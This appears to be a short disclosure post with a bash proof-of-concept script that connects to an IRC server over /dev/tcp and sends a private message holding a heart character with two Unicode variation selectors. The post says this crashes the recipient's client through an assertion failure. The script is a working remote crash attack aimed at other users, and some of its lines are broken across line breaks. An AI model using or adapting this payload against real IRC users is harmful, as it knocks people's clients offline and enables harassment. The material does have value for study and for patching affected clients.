irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'

This is a rudimentary example of how this attack can be used.

#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed  -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;

}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi


# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL


export allargs=("$@")
#test_ping ()
#{
#        if [[ ! -n $PING ]]; then
#       export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
#       fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi

export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
        export name=magicdebug
fi
run_irc_com ()
{
set -vx
    echo ${allargs[1]}
#    if  ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] &&  [[ ! ${allargs[0]}  =~ .*[.].*
]] || true) ) )     ; then
if [[ ! ${allargs[0]}  =~ .*[.].* &&  ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
    export COMM="$@";
    else
    export s=$1
    export p=$2
    export COMM="${@:3}"
        if [[ $p =~ .*[a-zA-Z] ]] ; then
                unset s p
                export COMM="${allargs[@]}"
        fi
    fi

    test -z $s||false  && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
    echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
        if [[ ! -n $PING ]]; then
            export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
        fi;
##      test_ping;
echo -e "${PING}\n" 1>&5
        if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
            export PINGSENT=isentmyping;
        fi;
        if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
        echo "$h" 2>&1;
    done

}

run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name "'{print $2}'